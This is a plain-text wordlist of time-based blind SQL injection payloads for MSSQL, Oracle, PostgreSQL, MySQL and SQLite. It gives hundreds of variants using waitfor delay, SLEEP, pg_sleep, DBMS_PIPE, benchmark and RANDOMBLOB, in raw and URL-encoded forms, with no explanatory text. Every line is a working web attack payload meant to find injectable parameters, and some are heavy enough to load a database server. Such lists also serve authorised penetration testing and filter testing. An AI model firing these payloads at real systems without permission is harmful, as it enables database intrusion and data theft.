#MSSQL
;waitfor delay '0:0:10'--
);waitfor delay '0:0:10'--
';waitfor delay '0:0:10'--
');waitfor delay '0:0:10'--
));waitfor delay '0:0:10'--
x";waitfor delay '0:0:10'--
x");waitfor delay '0:0:10'--
x"';waitfor delay '0:0:10'--
x"');waitfor delay '0:0:10'--
x"));waitfor delay '0:0:10'--
x';waitfor delay '0:0:10'--
x');waitfor delay '0:0:10'--
x'';waitfor delay '0:0:10'--
x'');waitfor delay '0:0:10'--
x'));waitfor delay '0:0:10'--

#Oracle
AND [RANDNUM]=DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME])--
AND [RANDNUM]=DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME])/**/
dbms_pipe.receive_message(('a'),10)/**/
dbms_pipe.receive_message(('a'),10)#
x"AND [RANDNUM]=DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME])--
x"AND [RANDNUM]=DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME])/**/
x"dbms_pipe.receive_message(('a'),10)/**/
x"dbms_pipe.receive_message(('a'),10)#
x'AND [RANDNUM]=DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME])--
x'AND [RANDNUM]=DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME])/**/
x'dbms_pipe.receive_message(('a'),10)/**/
x'dbms_pipe.receive_message(('a'),10)#

#PostGreSQL
x'AND [RANDNUM]=(SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME]))/**/
x'AND [RANDNUM]=(SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000))#
x"AND [RANDNUM]=(SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME]))/**/
x"AND [RANDNUM]=(SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000))#
AND [RANDNUM]=(SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME]))/**/
AND [RANDNUM]=(SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000))#

#Extra
x'XOR(if(now()=sysdate(),sleep(6),0))XOR'Z 
x"XOR(if(now()=sysdate(),sleep(6),0))XOR'Z 

#Generic Time Based
sleep(5)#
1 or sleep(5)#
" or sleep(5)#
' or sleep(5)#
" or sleep(5)="
' or sleep(5)='
1) or sleep(5)#
") or sleep(5)="
') or sleep(5)='
1)) or sleep(5)#
")) or sleep(5)="
')) or sleep(5)='
;waitfor delay '0:0:5'--
);waitfor delay '0:0:5'--
';waitfor delay '0:0:5'--
";waitfor delay '0:0:5'--
');waitfor delay '0:0:5'--
");waitfor delay '0:0:5'--
));waitfor delay '0:0:5'--
'));waitfor delay '0:0:5'--
"));waitfor delay '0:0:5'--
benchmark(10000000,MD5(1))#
1 or benchmark(10000000,MD5(1))#
" or benchmark(10000000,MD5(1))#
' or benchmark(10000000,MD5(1))#
1) or benchmark(10000000,MD5(1))#
") or benchmark(10000000,MD5(1))#
') or benchmark(10000000,MD5(1))#
1)) or benchmark(10000000,MD5(1))#
")) or benchmark(10000000,MD5(1))#
')) or benchmark(10000000,MD5(1))#
pg_sleep(5)--
1 or pg_sleep(5)--
" or pg_sleep(5)--
' or pg_sleep(5)--
1) or pg_sleep(5)--
") or pg_sleep(5)--
') or pg_sleep(5)--
1)) or pg_sleep(5)--
")) or pg_sleep(5)--
')) or pg_sleep(5)--
AND (SELECT * FROM (SELECT(SLEEP(5)))bAKL) AND 'vRxe'='vRxe
AND (SELECT * FROM (SELECT(SLEEP(5)))YjoC) AND '%'='
AND (SELECT * FROM (SELECT(SLEEP(5)))nQIP)
AND (SELECT * FROM (SELECT(SLEEP(5)))nQIP)--
AND (SELECT * FROM (SELECT(SLEEP(5)))nQIP)#
SLEEP(5)#
SLEEP(5)--
SLEEP(5)="
SLEEP(5)='
or SLEEP(5)
or SLEEP(5)#
or SLEEP(5)--
or SLEEP(5)="
or SLEEP(5)='
waitfor delay '00:00:05'
waitfor delay '00:00:05'--
waitfor delay '00:00:05'#
benchmark(50000000,MD5(1))
benchmark(50000000,MD5(1))--
benchmark(50000000,MD5(1))#
or benchmark(50000000,MD5(1))
or benchmark(50000000,MD5(1))--
or benchmark(50000000,MD5(1))#
pg_SLEEP(5)
pg_SLEEP(5)--
pg_SLEEP(5)#
or pg_SLEEP(5)
or pg_SLEEP(5)--
or pg_SLEEP(5)#
'\"
AnD SLEEP(5)
AnD SLEEP(5)--
AnD SLEEP(5)#
&&SLEEP(5)
&&SLEEP(5)--
&&SLEEP(5)#
' AnD SLEEP(5) ANd '1
'&&SLEEP(5)&&'1
ORDER BY SLEEP(5)
ORDER BY SLEEP(5)--
ORDER BY SLEEP(5)#
(SELECT * FROM (SELECT(SLEEP(5)))ecMj)
(SELECT * FROM (SELECT(SLEEP(5)))ecMj)#
(SELECT * FROM (SELECT(SLEEP(5)))ecMj)--
+benchmark(3200,SHA1(1))+'
+ SLEEP(10) + '
RANDOMBLOB(500000000/2)
AND 2947=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(500000000/2))))
OR 2947=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(500000000/2))))
RANDOMBLOB(1000000000/2)
AND 2947=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1000000000/2))))
OR 2947=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1000000000/2))))
SLEEP(1)/*' or SLEEP(1) or '" or SLEEP(1) or "*/

x"sleep(5)#
x"1 or sleep(5)#
x"" or sleep(5)#
x"' or sleep(5)#
x"" or sleep(5)="
x"' or sleep(5)='
x"1) or sleep(5)#
x"") or sleep(5)="
x"') or sleep(5)='
x"1)) or sleep(5)#
x"")) or sleep(5)="
x"')) or sleep(5)='
x";waitfor delay '0:0:5'--
x");waitfor delay '0:0:5'--
x"';waitfor delay '0:0:5'--
x"";waitfor delay '0:0:5'--
x"');waitfor delay '0:0:5'--
x"");waitfor delay '0:0:5'--
x"));waitfor delay '0:0:5'--
x"'));waitfor delay '0:0:5'--
x""));waitfor delay '0:0:5'--
x"benchmark(10000000,MD5(1))#
x"1 or benchmark(10000000,MD5(1))#
x"" or benchmark(10000000,MD5(1))#
x"' or benchmark(10000000,MD5(1))#
x"1) or benchmark(10000000,MD5(1))#
x"") or benchmark(10000000,MD5(1))#
x"') or benchmark(10000000,MD5(1))#
x"1)) or benchmark(10000000,MD5(1))#
x"")) or benchmark(10000000,MD5(1))#
x"')) or benchmark(10000000,MD5(1))#
x"pg_sleep(5)--
x"1 or pg_sleep(5)--
x"" or pg_sleep(5)--
x"' or pg_sleep(5)--
x"1) or pg_sleep(5)--
x"") or pg_sleep(5)--
x"') or pg_sleep(5)--
x"1)) or pg_sleep(5)--
x"")) or pg_sleep(5)--
x"')) or pg_sleep(5)--
x"AND (SELECT * FROM (SELECT(SLEEP(5)))bAKL) AND 'vRxe'='vRxe
x"AND (SELECT * FROM (SELECT(SLEEP(5)))YjoC) AND '%'='
x"AND (SELECT * FROM (SELECT(SLEEP(5)))nQIP)
x"AND (SELECT * FROM (SELECT(SLEEP(5)))nQIP)--
x"AND (SELECT * FROM (SELECT(SLEEP(5)))nQIP)#
x"SLEEP(5)#
x"SLEEP(5)--
x"SLEEP(5)="
x"SLEEP(5)='
x"or SLEEP(5)
x"or SLEEP(5)#
x"or SLEEP(5)--
x"or SLEEP(5)="
x"or SLEEP(5)='
x"waitfor delay '00:00:05'
x"waitfor delay '00:00:05'--
x"waitfor delay '00:00:05'#
x"benchmark(50000000,MD5(1))
x"benchmark(50000000,MD5(1))--
x"benchmark(50000000,MD5(1))#
x"or benchmark(50000000,MD5(1))
x"or benchmark(50000000,MD5(1))--
x"or benchmark(50000000,MD5(1))#
x"pg_SLEEP(5)
x"pg_SLEEP(5)--
x"pg_SLEEP(5)#
x"or pg_SLEEP(5)
x"or pg_SLEEP(5)--
x"or pg_SLEEP(5)#
x"'\"
x"AnD SLEEP(5)
x"AnD SLEEP(5)--
x"AnD SLEEP(5)#
x"&&SLEEP(5)
x"&&SLEEP(5)--
x"&&SLEEP(5)#
x"' AnD SLEEP(5) ANd '1
x"'&&SLEEP(5)&&'1
x"ORDER BY SLEEP(5)
x"ORDER BY SLEEP(5)--
x"ORDER BY SLEEP(5)#
x"(SELECT * FROM (SELECT(SLEEP(5)))ecMj)
x"(SELECT * FROM (SELECT(SLEEP(5)))ecMj)#
x"(SELECT * FROM (SELECT(SLEEP(5)))ecMj)--
x"+benchmark(3200,SHA1(1))+'
x"+ SLEEP(10) + '
x"RANDOMBLOB(500000000/2)
x"AND 2947=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(500000000/2))))
x"OR 2947=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(500000000/2))))
x"RANDOMBLOB(1000000000/2)
x"AND 2947=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1000000000/2))))
x"OR 2947=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1000000000/2))))
x"SLEEP(1)/*' or SLEEP(1) or '" or SLEEP(1) or "*/

x'sleep(5)#
x'1 or sleep(5)#
x'" or sleep(5)#
x'' or sleep(5)#
x'" or sleep(5)="
x'' or sleep(5)='
x'1) or sleep(5)#
x'") or sleep(5)="
x'') or sleep(5)='
x'1)) or sleep(5)#
x'")) or sleep(5)="
x'')) or sleep(5)='
x';waitfor delay '0:0:5'--
x');waitfor delay '0:0:5'--
x'';waitfor delay '0:0:5'--
x'";waitfor delay '0:0:5'--
x'');waitfor delay '0:0:5'--
x'");waitfor delay '0:0:5'--
x'));waitfor delay '0:0:5'--
x''));waitfor delay '0:0:5'--
x'"));waitfor delay '0:0:5'--
x'benchmark(10000000,MD5(1))#
x'1 or benchmark(10000000,MD5(1))#
x'" or benchmark(10000000,MD5(1))#
x'' or benchmark(10000000,MD5(1))#
x'1) or benchmark(10000000,MD5(1))#
x'") or benchmark(10000000,MD5(1))#
x'') or benchmark(10000000,MD5(1))#
x'1)) or benchmark(10000000,MD5(1))#
x'")) or benchmark(10000000,MD5(1))#
x'')) or benchmark(10000000,MD5(1))#
x'pg_sleep(5)--
x'1 or pg_sleep(5)--
x'" or pg_sleep(5)--
x'' or pg_sleep(5)--
x'1) or pg_sleep(5)--
x'") or pg_sleep(5)--
x'') or pg_sleep(5)--
x'1)) or pg_sleep(5)--
x'")) or pg_sleep(5)--
x'')) or pg_sleep(5)--
x'AND (SELECT * FROM (SELECT(SLEEP(5)))bAKL) AND 'vRxe'='vRxe
x'AND (SELECT * FROM (SELECT(SLEEP(5)))YjoC) AND '%'='
x'AND (SELECT * FROM (SELECT(SLEEP(5)))nQIP)
x'AND (SELECT * FROM (SELECT(SLEEP(5)))nQIP)--
x'AND (SELECT * FROM (SELECT(SLEEP(5)))nQIP)#
x'SLEEP(5)#
x'SLEEP(5)--
x'SLEEP(5)="
x'SLEEP(5)='
x'or SLEEP(5)
x'or SLEEP(5)#
x'or SLEEP(5)--
x'or SLEEP(5)="
x'or SLEEP(5)='
x'waitfor delay '00:00:05'
x'waitfor delay '00:00:05'--
x'waitfor delay '00:00:05'#
x'benchmark(50000000,MD5(1))
x'benchmark(50000000,MD5(1))--
x'benchmark(50000000,MD5(1))#
x'or benchmark(50000000,MD5(1))
x'or benchmark(50000000,MD5(1))--
x'or benchmark(50000000,MD5(1))#
x'pg_SLEEP(5)
x'pg_SLEEP(5)--
x'pg_SLEEP(5)#
x'or pg_SLEEP(5)
x'or pg_SLEEP(5)--
x'or pg_SLEEP(5)#
x''\"
x'AnD SLEEP(5)
x'AnD SLEEP(5)--
x'AnD SLEEP(5)#
x'&&SLEEP(5)
x'&&SLEEP(5)--
x'&&SLEEP(5)#
x'' AnD SLEEP(5) ANd '1
x''&&SLEEP(5)&&'1
x'ORDER BY SLEEP(5)
x'ORDER BY SLEEP(5)--
x'ORDER BY SLEEP(5)#
x'(SELECT * FROM (SELECT(SLEEP(5)))ecMj)
x'(SELECT * FROM (SELECT(SLEEP(5)))ecMj)#
x'(SELECT * FROM (SELECT(SLEEP(5)))ecMj)--
x'+benchmark(3200,SHA1(1))+'
x'+ SLEEP(10) + '
x'RANDOMBLOB(500000000/2)
x'AND 2947=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(500000000/2))))
x'OR 2947=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(500000000/2))))
x'RANDOMBLOB(1000000000/2)
x'AND 2947=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1000000000/2))))
x'OR 2947=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1000000000/2))))
x'SLEEP(1)/*' or SLEEP(1) or '" or SLEEP(1) or "*/


#URL encoded
#MSSQL
%3Bwaitfor%20delay%20%270%3A0%3A10%27--
%29%3Bwaitfor%20delay%20%270%3A0%3A10%27--
%27%3Bwaitfor%20delay%20%270%3A0%3A10%27--
%27%29%3Bwaitfor%20delay%20%270%3A0%3A10%27--
%29%29%3Bwaitfor%20delay%20%270%3A0%3A10%27--
x%22%3Bwaitfor%20delay%20%270%3A0%3A10%27--
x%22%29%3Bwaitfor%20delay%20%270%3A0%3A10%27--
x%22%27%3Bwaitfor%20delay%20%270%3A0%3A10%27--
x%22%27%29%3Bwaitfor%20delay%20%270%3A0%3A10%27--
x%22%29%29%3Bwaitfor%20delay%20%270%3A0%3A10%27--
x%27%3Bwaitfor%20delay%20%270%3A0%3A10%27--
x%27%29%3Bwaitfor%20delay%20%270%3A0%3A10%27--
x%27%27%3Bwaitfor%20delay%20%270%3A0%3A10%27--
x%27%27%29%3Bwaitfor%20delay%20%270%3A0%3A10%27--
x%27%29%29%3Bwaitfor%20delay%20%270%3A0%3A10%27--

#Oracle
AND%20%5BRANDNUM%5D%3DDBMS_PIPE.RECEIVE_MESSAGE%28%27%5BRANDSTR%5D%27%2C%5BSLEEPTIME%5D%29--
AND%20%5BRANDNUM%5D%3DDBMS_PIPE.RECEIVE_MESSAGE%28%27%5BRANDSTR%5D%27%2C%5BSLEEPTIME%5D%29/%2A%2A/
dbms_pipe.receive_message%28%28%27a%27%29%2C10%29/%2A%2A/
dbms_pipe.receive_message%28%28%27a%27%29%2C10%29%23
x%22AND%20%5BRANDNUM%5D%3DDBMS_PIPE.RECEIVE_MESSAGE%28%27%5BRANDSTR%5D%27%2C%5BSLEEPTIME%5D%29--
x%22AND%20%5BRANDNUM%5D%3DDBMS_PIPE.RECEIVE_MESSAGE%28%27%5BRANDSTR%5D%27%2C%5BSLEEPTIME%5D%29/%2A%2A/
x%22dbms_pipe.receive_message%28%28%27a%27%29%2C10%29/%2A%2A/
x%22dbms_pipe.receive_message%28%28%27a%27%29%2C10%29%23
x%27AND%20%5BRANDNUM%5D%3DDBMS_PIPE.RECEIVE_MESSAGE%28%27%5BRANDSTR%5D%27%2C%5BSLEEPTIME%5D%29--
x%27AND%20%5BRANDNUM%5D%3DDBMS_PIPE.RECEIVE_MESSAGE%28%27%5BRANDSTR%5D%27%2C%5BSLEEPTIME%5D%29/%2A%2A/
x%27dbms_pipe.receive_message%28%28%27a%27%29%2C10%29/%2A%2A/
x%27dbms_pipe.receive_message%28%28%27a%27%29%2C10%29%23

#PostGreSQL
x%27AND%20%5BRANDNUM%5D%3D%28SELECT%20%5BRANDNUM%5D%20FROM%20PG_SLEEP%28%5BSLEEPTIME%5D%29%29/%2A%2A/
x%27AND%20%5BRANDNUM%5D%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C%5BSLEEPTIME%5D000000%29%29%23
x%22AND%20%5BRANDNUM%5D%3D%28SELECT%20%5BRANDNUM%5D%20FROM%20PG_SLEEP%28%5BSLEEPTIME%5D%29%29/%2A%2A/
x%22AND%20%5BRANDNUM%5D%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C%5BSLEEPTIME%5D000000%29%29%23
AND%20%5BRANDNUM%5D%3D%28SELECT%20%5BRANDNUM%5D%20FROM%20PG_SLEEP%28%5BSLEEPTIME%5D%29%29/%2A%2A/
AND%20%5BRANDNUM%5D%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C%5BSLEEPTIME%5D000000%29%29%23

#Extra
x%27XOR%28if%28now%28%29%3Dsysdate%28%29%2Csleep%286%29%2C0%29%29XOR%27Z
x%22XOR%28if%28now%28%29%3Dsysdate%28%29%2Csleep%286%29%2C0%29%29XOR%27Z

#Generic Time Based
sleep%285%29%23
1%20or%20sleep%285%29%23
%22%20or%20sleep%285%29%23
%27%20or%20sleep%285%29%23
%22%20or%20sleep%285%29%3D%22
%27%20or%20sleep%285%29%3D%27
1%29%20or%20sleep%285%29%23
%22%29%20or%20sleep%285%29%3D%22
%27%29%20or%20sleep%285%29%3D%27
1%29%29%20or%20sleep%285%29%23
%22%29%29%20or%20sleep%285%29%3D%22
%27%29%29%20or%20sleep%285%29%3D%27
%3Bwaitfor%20delay%20%270%3A0%3A5%27--
%29%3Bwaitfor%20delay%20%270%3A0%3A5%27--
%27%3Bwaitfor%20delay%20%270%3A0%3A5%27--
%22%3Bwaitfor%20delay%20%270%3A0%3A5%27--
%27%29%3Bwaitfor%20delay%20%270%3A0%3A5%27--
%22%29%3Bwaitfor%20delay%20%270%3A0%3A5%27--
%29%29%3Bwaitfor%20delay%20%270%3A0%3A5%27--
%27%29%29%3Bwaitfor%20delay%20%270%3A0%3A5%27--
%22%29%29%3Bwaitfor%20delay%20%270%3A0%3A5%27--
benchmark%2810000000%2CMD5%281%29%29%23
1%20or%20benchmark%2810000000%2CMD5%281%29%29%23
%22%20or%20benchmark%2810000000%2CMD5%281%29%29%23
%27%20or%20benchmark%2810000000%2CMD5%281%29%29%23
1%29%20or%20benchmark%2810000000%2CMD5%281%29%29%23
%22%29%20or%20benchmark%2810000000%2CMD5%281%29%29%23
%27%29%20or%20benchmark%2810000000%2CMD5%281%29%29%23
1%29%29%20or%20benchmark%2810000000%2CMD5%281%29%29%23
%22%29%29%20or%20benchmark%2810000000%2CMD5%281%29%29%23
%27%29%29%20or%20benchmark%2810000000%2CMD5%281%29%29%23
pg_sleep%285%29--
1%20or%20pg_sleep%285%29--
%22%20or%20pg_sleep%285%29--
%27%20or%20pg_sleep%285%29--
1%29%20or%20pg_sleep%285%29--
%22%29%20or%20pg_sleep%285%29--
%27%29%20or%20pg_sleep%285%29--
1%29%29%20or%20pg_sleep%285%29--
%22%29%29%20or%20pg_sleep%285%29--
%27%29%29%20or%20pg_sleep%285%29--
AND%20%28SELECT%20%2A%20FROM%20%28SELECT%28SLEEP%285%29%29%29bAKL%29%20AND%20%27vRxe%27%3D%27vRxe
AND%20%28SELECT%20%2A%20FROM%20%28SELECT%28SLEEP%285%29%29%29YjoC%29%20AND%20%27%25%27%3D%27
AND%20%28SELECT%20%2A%20FROM%20%28SELECT%28SLEEP%285%29%29%29nQIP%29
AND%20%28SELECT%20%2A%20FROM%20%28SELECT%28SLEEP%285%29%29%29nQIP%29--
AND%20%28SELECT%20%2A%20FROM%20%28SELECT%28SLEEP%285%29%29%29nQIP%29%23
SLEEP%285%29%23
SLEEP%285%29--
SLEEP%285%29%3D%22
SLEEP%285%29%3D%27
or%20SLEEP%285%29
or%20SLEEP%285%29%23
or%20SLEEP%285%29--
or%20SLEEP%285%29%3D%22
or%20SLEEP%285%29%3D%27
waitfor%20delay%20%2700%3A00%3A05%27
waitfor%20delay%20%2700%3A00%3A05%27--
waitfor%20delay%20%2700%3A00%3A05%27%23
benchmark%2850000000%2CMD5%281%29%29
benchmark%2850000000%2CMD5%281%29%29--
benchmark%2850000000%2CMD5%281%29%29%23
or%20benchmark%2850000000%2CMD5%281%29%29
or%20benchmark%2850000000%2CMD5%281%29%29--
or%20benchmark%2850000000%2CMD5%281%29%29%23
pg_SLEEP%285%29
pg_SLEEP%285%29--
pg_SLEEP%285%29%23
or%20pg_SLEEP%285%29
or%20pg_SLEEP%285%29--
or%20pg_SLEEP%285%29%23
%27%5C%22
AnD%20SLEEP%285%29
AnD%20SLEEP%285%29--
AnD%20SLEEP%285%29%23
%26%26SLEEP%285%29
%26%26SLEEP%285%29--
%26%26SLEEP%285%29%23
%27%20AnD%20SLEEP%285%29%20ANd%20%271
%27%26%26SLEEP%285%29%26%26%271
ORDER%20BY%20SLEEP%285%29
ORDER%20BY%20SLEEP%285%29--
ORDER%20BY%20SLEEP%285%29%23
%28SELECT%20%2A%20FROM%20%28SELECT%28SLEEP%285%29%29%29ecMj%29
%28SELECT%20%2A%20FROM%20%28SELECT%28SLEEP%285%29%29%29ecMj%29%23
%28SELECT%20%2A%20FROM%20%28SELECT%28SLEEP%285%29%29%29ecMj%29--
%2Bbenchmark%283200%2CSHA1%281%29%29%2B%27
%2B%20SLEEP%2810%29%20%2B%20%27
RANDOMBLOB%28500000000/2%29
AND%202947%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000/2%29%29%29%29
OR%202947%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000/2%29%29%29%29
RANDOMBLOB%281000000000/2%29
AND%202947%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%281000000000/2%29%29%29%29
OR%202947%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%281000000000/2%29%29%29%29
SLEEP%281%29/%2A%27%20or%20SLEEP%281%29%20or%20%27%22%20or%20SLEEP%281%29%20or%20%22%2A/

x%22sleep%285%29%23
x%221%20or%20sleep%285%29%23
x%22%22%20or%20sleep%285%29%23
x%22%27%20or%20sleep%285%29%23
x%22%22%20or%20sleep%285%29%3D%22
x%22%27%20or%20sleep%285%29%3D%27
x%221%29%20or%20sleep%285%29%23
x%22%22%29%20or%20sleep%285%29%3D%22
x%22%27%29%20or%20sleep%285%29%3D%27
x%221%29%29%20or%20sleep%285%29%23
x%22%22%29%29%20or%20sleep%285%29%3D%22
x%22%27%29%29%20or%20sleep%285%29%3D%27
x%22%3Bwaitfor%20delay%20%270%3A0%3A5%27--
x%22%29%3Bwaitfor%20delay%20%270%3A0%3A5%27--
x%22%27%3Bwaitfor%20delay%20%270%3A0%3A5%27--
x%22%22%3Bwaitfor%20delay%20%270%3A0%3A5%27--
x%22%27%29%3Bwaitfor%20delay%20%270%3A0%3A5%27--
x%22%22%29%3Bwaitfor%20delay%20%270%3A0%3A5%27--
x%22%29%29%3Bwaitfor%20delay%20%270%3A0%3A5%27--
x%22%27%29%29%3Bwaitfor%20delay%20%270%3A0%3A5%27--
x%22%22%29%29%3Bwaitfor%20delay%20%270%3A0%3A5%27--
x%22benchmark%2810000000%2CMD5%281%29%29%23
x%221%20or%20benchmark%2810000000%2CMD5%281%29%29%23
x%22%22%20or%20benchmark%2810000000%2CMD5%281%29%29%23
x%22%27%20or%20benchmark%2810000000%2CMD5%281%29%29%23
x%221%29%20or%20benchmark%2810000000%2CMD5%281%29%29%23
x%22%22%29%20or%20benchmark%2810000000%2CMD5%281%29%29%23
x%22%27%29%20or%20benchmark%2810000000%2CMD5%281%29%29%23
x%221%29%29%20or%20benchmark%2810000000%2CMD5%281%29%29%23
x%22%22%29%29%20or%20benchmark%2810000000%2CMD5%281%29%29%23
x%22%27%29%29%20or%20benchmark%2810000000%2CMD5%281%29%29%23
x%22pg_sleep%285%29--
x%221%20or%20pg_sleep%285%29--
x%22%22%20or%20pg_sleep%285%29--
x%22%27%20or%20pg_sleep%285%29--
x%221%29%20or%20pg_sleep%285%29--
x%22%22%29%20or%20pg_sleep%285%29--
x%22%27%29%20or%20pg_sleep%285%29--
x%221%29%29%20or%20pg_sleep%285%29--
x%22%22%29%29%20or%20pg_sleep%285%29--
x%22%27%29%29%20or%20pg_sleep%285%29--
x%22AND%20%28SELECT%20%2A%20FROM%20%28SELECT%28SLEEP%285%29%29%29bAKL%29%20AND%20%27vRxe%27%3D%27vRxe
x%22AND%20%28SELECT%20%2A%20FROM%20%28SELECT%28SLEEP%285%29%29%29YjoC%29%20AND%20%27%25%27%3D%27
x%22AND%20%28SELECT%20%2A%20FROM%20%28SELECT%28SLEEP%285%29%29%29nQIP%29
x%22AND%20%28SELECT%20%2A%20FROM%20%28SELECT%28SLEEP%285%29%29%29nQIP%29--
x%22AND%20%28SELECT%20%2A%20FROM%20%28SELECT%28SLEEP%285%29%29%29nQIP%29%23
x%22SLEEP%285%29%23
x%22SLEEP%285%29--
x%22SLEEP%285%29%3D%22
x%22SLEEP%285%29%3D%27
x%22or%20SLEEP%285%29
x%22or%20SLEEP%285%29%23
x%22or%20SLEEP%285%29--
x%22or%20SLEEP%285%29%3D%22
x%22or%20SLEEP%285%29%3D%27
x%22waitfor%20delay%20%2700%3A00%3A05%27
x%22waitfor%20delay%20%2700%3A00%3A05%27--
x%22waitfor%20delay%20%2700%3A00%3A05%27%23
x%22benchmark%2850000000%2CMD5%281%29%29
x%22benchmark%2850000000%2CMD5%281%29%29--
x%22benchmark%2850000000%2CMD5%281%29%29%23
x%22or%20benchmark%2850000000%2CMD5%281%29%29
x%22or%20benchmark%2850000000%2CMD5%281%29%29--
x%22or%20benchmark%2850000000%2CMD5%281%29%29%23
x%22pg_SLEEP%285%29
x%22pg_SLEEP%285%29--
x%22pg_SLEEP%285%29%23
x%22or%20pg_SLEEP%285%29
x%22or%20pg_SLEEP%285%29--
x%22or%20pg_SLEEP%285%29%23
x%22%27%5C%22
x%22AnD%20SLEEP%285%29
x%22AnD%20SLEEP%285%29--
x%22AnD%20SLEEP%285%29%23
x%22%26%26SLEEP%285%29
x%22%26%26SLEEP%285%29--
x%22%26%26SLEEP%285%29%23
x%22%27%20AnD%20SLEEP%285%29%20ANd%20%271
x%22%27%26%26SLEEP%285%29%26%26%271
x%22ORDER%20BY%20SLEEP%285%29
x%22ORDER%20BY%20SLEEP%285%29--
x%22ORDER%20BY%20SLEEP%285%29%23
x%22%28SELECT%20%2A%20FROM%20%28SELECT%28SLEEP%285%29%29%29ecMj%29
x%22%28SELECT%20%2A%20FROM%20%28SELECT%28SLEEP%285%29%29%29ecMj%29%23
x%22%28SELECT%20%2A%20FROM%20%28SELECT%28SLEEP%285%29%29%29ecMj%29--
x%22%2Bbenchmark%283200%2CSHA1%281%29%29%2B%27
x%22%2B%20SLEEP%2810%29%20%2B%20%27
x%22RANDOMBLOB%28500000000/2%29
x%22AND%202947%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000/2%29%29%29%29
x%22OR%202947%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000/2%29%29%29%29
x%22RANDOMBLOB%281000000000/2%29
x%22AND%202947%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%281000000000/2%29%29%29%29
x%22OR%202947%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%281000000000/2%29%29%29%29
x%22SLEEP%281%29/%2A%27%20or%20SLEEP%281%29%20or%20%27%22%20or%20SLEEP%281%29%20or%20%22%2A/

x%27sleep%285%29%23
x%271%20or%20sleep%285%29%23
x%27%22%20or%20sleep%285%29%23
x%27%27%20or%20sleep%285%29%23
x%27%22%20or%20sleep%285%29%3D%22
x%27%27%20or%20sleep%285%29%3D%27
x%271%29%20or%20sleep%285%29%23
x%27%22%29%20or%20sleep%285%29%3D%22
x%27%27%29%20or%20sleep%285%29%3D%27
x%271%29%29%20or%20sleep%285%29%23
x%27%22%29%29%20or%20sleep%285%29%3D%22
x%27%27%29%29%20or%20sleep%285%29%3D%27
x%27%3Bwaitfor%20delay%20%270%3A0%3A5%27--
x%27%29%3Bwaitfor%20delay%20%270%3A0%3A5%27--
x%27%27%3Bwaitfor%20delay%20%270%3A0%3A5%27--
x%27%22%3Bwaitfor%20delay%20%270%3A0%3A5%27--
x%27%27%29%3Bwaitfor%20delay%20%270%3A0%3A5%27--
x%27%22%29%3Bwaitfor%20delay%20%270%3A0%3A5%27--
x%27%29%29%3Bwaitfor%20delay%20%270%3A0%3A5%27--
x%27%27%29%29%3Bwaitfor%20delay%20%270%3A0%3A5%27--
x%27%22%29%29%3Bwaitfor%20delay%20%270%3A0%3A5%27--
x%27benchmark%2810000000%2CMD5%281%29%29%23
x%271%20or%20benchmark%2810000000%2CMD5%281%29%29%23
x%27%22%20or%20benchmark%2810000000%2CMD5%281%29%29%23
x%27%27%20or%20benchmark%2810000000%2CMD5%281%29%29%23
x%271%29%20or%20benchmark%2810000000%2CMD5%281%29%29%23
x%27%22%29%20or%20benchmark%2810000000%2CMD5%281%29%29%23
x%27%27%29%20or%20benchmark%2810000000%2CMD5%281%29%29%23
x%271%29%29%20or%20benchmark%2810000000%2CMD5%281%29%29%23
x%27%22%29%29%20or%20benchmark%2810000000%2CMD5%281%29%29%23
x%27%27%29%29%20or%20benchmark%2810000000%2CMD5%281%29%29%23
x%27pg_sleep%285%29--
x%271%20or%20pg_sleep%285%29--
x%27%22%20or%20pg_sleep%285%29--
x%27%27%20or%20pg_sleep%285%29--
x%271%29%20or%20pg_sleep%285%29--
x%27%22%29%20or%20pg_sleep%285%29--
x%27%27%29%20or%20pg_sleep%285%29--
x%271%29%29%20or%20pg_sleep%285%29--
x%27%22%29%29%20or%20pg_sleep%285%29--
x%27%27%29%29%20or%20pg_sleep%285%29--
x%27AND%20%28SELECT%20%2A%20FROM%20%28SELECT%28SLEEP%285%29%29%29bAKL%29%20AND%20%27vRxe%27%3D%27vRxe
